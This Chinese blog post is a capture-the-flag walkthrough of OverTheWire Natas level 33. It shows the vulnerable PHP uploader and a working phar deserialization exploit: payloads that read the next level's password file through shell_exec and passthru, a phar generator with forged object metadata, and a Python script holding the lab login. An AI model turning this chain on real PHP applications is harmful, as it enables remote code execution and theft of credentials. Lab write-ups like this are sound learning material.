0
点赞
收藏
分享

微信扫一扫

OverTheWire攻关过程-Natas模块33


我们打开关卡lv33,登陆查看信息


OverTheWire攻关过程-Natas模块33_Apache


是一个上传文件的页面

应该是做了很多过滤


OverTheWire攻关过程-Natas模块33_php_02


查看源码


// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
    private $filename=""; 		//三个私有参数
    private $signature='adeafbadbabec0dedabada55ba55d00d';
    private $init=False;

    function __construct(){		//类创建时调用
        $this->filename=$_POST["filename"];
        if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) {	//限制文件大小
            echo "File is too big<br>";
        }
        else {														//将文件移动到/natas33/upload/目录下
            if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
                echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                echo "Firmware upgrad initialised.<br>";
            }
            else{
                echo "There was an error uploading the file, please try again!<br>";
            }
        }
    }

    function __destruct(){		//类销毁时调用
        // upgrade firmware at the end of this script

        // "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)."
        if(getcwd() === "/") chdir("/natas33/uploads/");	//getchwd() 函数返回当前工作目录。chdir() 函数改变当前的目录。
        if(md5_file($this->filename) == $this->signature){	//md5_file() 函数计算文件的 MD5 散列。
            echo "Congratulations! Running firmware update: $this->filename <br>";
            passthru("php " . $this->filename); //执行外部命令
        }
        else{
            echo "Failur! MD5sum mismatch!<br>";
        }
    }
}

session_start();
if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
    new Executor();
}


查询大神的思路


OverTheWire攻关过程-Natas模块33_上传_03


思路是反序列化漏洞


OverTheWire攻关过程-Natas模块33_php_04


按照思路

test.php


<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>


OverTheWire攻关过程-Natas模块33_Apache_05


打开bp拦截


OverTheWire攻关过程-Natas模块33_Apache_06


1、我们先上传查看密码的php文件


OverTheWire攻关过程-Natas模块33_上传_07


上传test.php


OverTheWire攻关过程-Natas模块33_php_08


点击上传


OverTheWire攻关过程-Natas模块33_Apache_09


修改名字


OverTheWire攻关过程-Natas模块33_Apache_10


主要是与phar文件相对应


OverTheWire攻关过程-Natas模块33_上传_11


提示md5的值不对

2、我们再上传phar文件


OverTheWire攻关过程-Natas模块33_上传_12


拦截

修改名字


OverTheWire攻关过程-Natas模块33_上传_13


修改名字方便执行


OverTheWire攻关过程-Natas模块33_上传_14


成功上传


OverTheWire攻关过程-Natas模块33_php_15


我们执行


OverTheWire攻关过程-Natas模块33_Apache_16


重新上传一遍

只是修改下名字


OverTheWire攻关过程-Natas模块33_php_17


出现报错


OverTheWire攻关过程-Natas模块33_上传_18


名字错了


我们重新来一遍

使用python脚本


natas33solution.py


import subprocess
import re
import requests
from requests.auth import HTTPBasicAuth

def get_pass():
    
    auth = HTTPBasicAuth('natas33', 'APwWDD3fRAf6226sgBOBaSptGwvXwQhG')
    phar_payload = {'uploadedfile': open('exploit.phar', 'rb')}    
    php_payload = {'uploadedfile': open('payload.php', 'rb')}
    final_payload = {'uploadedfile': open('exploit.phar', 'rb')}    
    #Filename assignments for each payload
    phar_data = {'filename':'taldgan.phar'}
    php_data = {'filename':'taldgan.php'}
    final_data = {'filename':'phar://taldgan.phar'}

    #Need to make 3 request: 1 to upload the php payload, 1 to upload the phar, and 1 to read the phar with phar://taldgan.phar as the filename
    requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=phar_payload, data=phar_data)  
    requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=php_payload, data=php_data)  
    r = requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=final_payload, data=final_data)  
    passreg = '[a-zA-Z0-9]{32}'
    print(re.findall(passreg, r.text)[0])

if __name__ == "__main__":
    get_pass()


附属的文件为


gen_phar_payload.php


<?php
            // graz XeR, the first to solve it! thanks for the feedback!
            // ~morla
            class Executor{
		private $filename='taldgan.php';
                private $signature='6ae14bb82be23c2cbd46a47366cf08c0';
            }
	$phar = new Phar('exploit.phar');
	$phar->startBuffering();
	$phar->addFromString("payload.php", "payload");
	$phar->setStub('<?php __HALT_COMPILER(); ? >');

	$object = new Executor();
	$phar->setMetadata($object);
	$phar->stopBuffering();
?>


md5payload


<?php
	print md5_file($argv[1]) . "\n";
?>


payload.php


<?php passthru('cat /etc/natas_webpass/natas34'); ?>


我们使用vscode跑

等待结果



OverTheWire攻关过程-Natas模块33_php_19


由于natas34打不开,无法验证密码。

等网络好一点,再试一试


举报

相关推荐

0 条评论